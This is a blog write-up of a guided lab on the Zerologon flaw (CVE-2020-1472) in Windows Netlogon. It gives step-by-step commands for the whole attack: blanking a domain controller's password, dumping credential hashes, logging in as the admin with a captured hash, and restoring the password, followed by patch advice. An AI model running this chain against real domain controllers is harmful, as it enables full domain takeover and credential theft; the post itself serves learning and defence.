Open in app

Sign in

Write

Sign in

CVE — 2020–1472 Zerologon Vulnerability Exploitation & Remediation

Noel Varghese
5 min readJan 11, 2022

--

NOTE: This is my first vulnerability-related writeup and I have tried to write and explain in layman terms. There may be knowledge gaps in between, which I am trying my hardest to cover and understand

There’s also a Gitbooks version of the same challenge, written by me. You can go ahead and check it out!

Section 1 — Exploiting Zerologon Vulnerability(CVE 2020–1472)

About the Vulnerability

Netlogon is a service that runs on the Domain Controller. This service is responsible for authenticating user logins — effectively verifying the user is who they claim to be. As this function is one of the core functions of a Domain Controller, the Netlogon service cannot be stopped or firewalled off from networks of domain-joined computers.

  • CVSS Score — 10
  • Attack Complexity — Low
  • Privileges Required — Low
  • Vulnerability Found — July 2020

Exploitable Point

The Netlogon RPC service, used for computer and user authentication in Windows, also allows a computer to update its computer password within the domain. For several historical reasons, this service does not use standard authentication protocols to authenticate the computer. The vulnerability exists within the non-standard method used to authenticate.

Twitter thread providing a nice walkthrough — https://twitter.com/_dirkjan/status/1306280553281449985

Exploitation Walkthrough

What do you need?
Impacket — to capture password hashes and dump them
Windows 10 OS (on which the vulnerable service exists)
Windows 10 VM — to perform the exploit on
RangeForce’s ZeroLogon Vulnerability Lab (Guided Mode)

First, let’s clone the impacket repository from Github
Step to install:-

git clone https://github.com/SecureAuthCorp/impacket.git

Now, let’s copy the exploit too from Github <cve-2020–1472-exploit.py>

Credits to dirkjanm.

https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py

Export the exploit to /impacket/examples/CVE-2020–1472/

Now, let’s switch to this directory

By now, we have identified the following details about the vulnerable service:-

NetBIOS computer name: DC
IP address: 192.168.0.4

Syntax of exploit command:-
./cve-2020–1472-exploit.py -n <NetBIOS computer name> -t <IP address>

Now to run the script and exploit

./cve-2020–1472-exploit.py -n DC -t 192.168.0.4

What does this exploit do?

It resets the Domain Controller’s account password to an empty string(easy login with a spacebar)

The gist: Your Domain Controller account’s password is a blank string

Next objective-dump password hashes from the Domain Controller

Components required:-

Domain Controller name
NetBios Name
IP Address of vulnerable host

We make use of the secretsdump.py module from Impacket to perform this task

Password Dump command syntax-
python3 secretsdump.py -no-pass -just dc<Domain/NETBIOS_NAME\$@IP>

(This command does not work with the simple execution command ./)

Filling in the blanks:-

python3 secretsdump.py -no-pass -just-dc CONTOSO.AZURE/DC\$@192.168.0.4

This leads to the dumping of around 60 password hashes:-

Next objective — Logging onto the account of ContosoAdmin (Domain Controller admin’s account) — using the account’s dumped hash

Scrolling through the dumped list, we find the appropriate entry:-

Logging on to the server, using the wmiexec.py module:-

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a2bd759faf686d052f5f7c8337a2ff51 CONTOSO.AZURE/ContosoAdmin@192.168.0.4

We are in!

Section 2 — Remediation from the Vulnerability

How?

  • Manually restoring your password (or)
  • Update and install the August 2020 & February 2021 Patch Tuesday release for the same (patches released in two phases)

(Manual Password Restore) — How does it work?

As you exploit the vulnerability, the password hash is being erased and replaced with a blank string in the SAM file, from where your computer cross-checks passwords as a user logs in

Using the same methodology, we copy your compromised password (blank space in this case) from the SAM hive to the Domain Controller of the exploited machine. Further, copy it to your Kali VM and then delete it from the Domain Controller

Which we achieve from the following steps:-

Now exiting the Windows machine, using exit- to the Kali machine

The next task is to parse the obtained SAM file, from the Domain Controller

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Why parse? — To see where accounts are mapped to and to gain other information

Recovered password hash — 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480

Now to place the final piece of the jigsaw — restoring the original password. For that, we have a customized script named — reinstall_original_pw.py

Syntax — reinstall_original_pw.py <DC_NETBIOS_NAME> <DC_IP_ADDR> <ORIG_NT_HASH>

Filling in the blanks here,

./reinstall_original_pw.py DC 192.168.0.4 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480

Conclusion:-

This is an easy vulnerability to exploit, with less complexity, considering that we are still dependant on IT Systems to perform administrative tasks. This may be disputed, but 100% security may be a myth unless drastic action is taken to respond and patch even the slightest of issues

Connect with me on LinkedIn — https://www.linkedin.com/in/noel--varghese

Thank you for the time taken to devour this red team blog entry.

Zerologon
Writeup
Cve 2020 1472

--

--

Noel Varghese
Noel Varghese

Written by Noel Varghese

108 Followers
2 Following

Threat Researcher at CloudSEK Security+ | eJPT | Connect with me on LinkedIn — https://www.linkedin.com/in/noel--varghese

Responses (1)

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams